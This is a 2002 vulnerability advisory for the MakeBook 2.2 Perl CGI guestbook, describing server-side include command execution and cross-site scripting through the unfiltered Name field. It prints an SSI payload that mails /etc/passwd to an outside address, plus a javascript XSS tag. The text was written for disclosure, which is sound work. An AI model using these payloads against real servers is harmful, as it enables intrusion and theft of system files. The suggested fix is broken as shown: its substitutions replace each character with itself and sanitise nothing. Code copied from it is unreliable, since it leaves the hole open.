('binary' encoding is not supported, stored as-is) [ DownBload Security Research Lab Advisory ] [-------------------------------------------------------------------------] Advisory name: SSI & CSS execution in MakeBook 2.2 Advisory number: 5 Application: MakeBook 2.2 (CGI script) Application author: Kristina Pfaff-Harris Source: http://www.tesol.net/scriptmail.html Date: 12.6.2002 Impact: remote user can execute shell commands & cross site scripting Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4 Discovered by: DownBload Mail me @: downbloadat_private ------[ Overview "...MakeBook v2.2 is a simple program which can be used as a guestbook, an ongoing writing project where each person adds to an ongoing story, a comment board, or even a way to let people add comments to many individual pages. It allows a user to enter their name, email address, and some text which will then be added to the "bookfile". Originally intended for use in writing a continuing story or journal, where different students could add to the story as they went along, it has evolved into a more flexible system which allows the owner to choose how the "book" entries should appear, and even what pages they appear on..." ------[ Problem Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse. It works fine, but troubles comes when you look for security measures in program. When you want to sign guestbook, you have to write your name, email address, and some text. Script does remove 'some' special-char in $text, but script doesn't replace special-chars in $name at all, and because of that, it is possible instead of name, enter and execute some SSI(Server Side Includes) or CSS(Cross Site Scripting) code. 'Buggy' code: ... $name =$data{"Name"}; $email =$data{"Email"}; $text =$data{"Text"}; $text =~ s/</</g; $text =~ s/>/>/g; ... ------[ Examples SSI attack ~~~~~~~~~~ Name: <!--#exec cmd="/bin/mail downbloadat_private < /etc/passwd"--> E-mail: downbloadat_private Text: I hacked you, my kung-fu is the best... ;) CSS attack ~~~~~~~~~~ Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');"> E-mail: downbloadat_private Text: I hacked you, my kung-fu is the best... ;) I won't give you more examples, use your own imagination :). BTW: SSI attack depends on web server, because some web servers comes with, and some without support for SSI. ------[ Solution Solution for this bug would be to filter special characters from user input. For now, you can use this: ... $name = $data{"Name"}; $name =~ s/</</g; $name =~ s/>/>/g; $email = $data{"Email"}; $email =~ s/</</g; $email =~ s/>/>/g; $text = $data{"Text"}; $text =~ s/</</g; $text =~ s/>/>/g; ... ------[ Greetz Greetz goes to #hr.hackers <irc.carnet.hr>. Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, h4z4rd, fi, Fr1c, harlequin and www.active-security.org.
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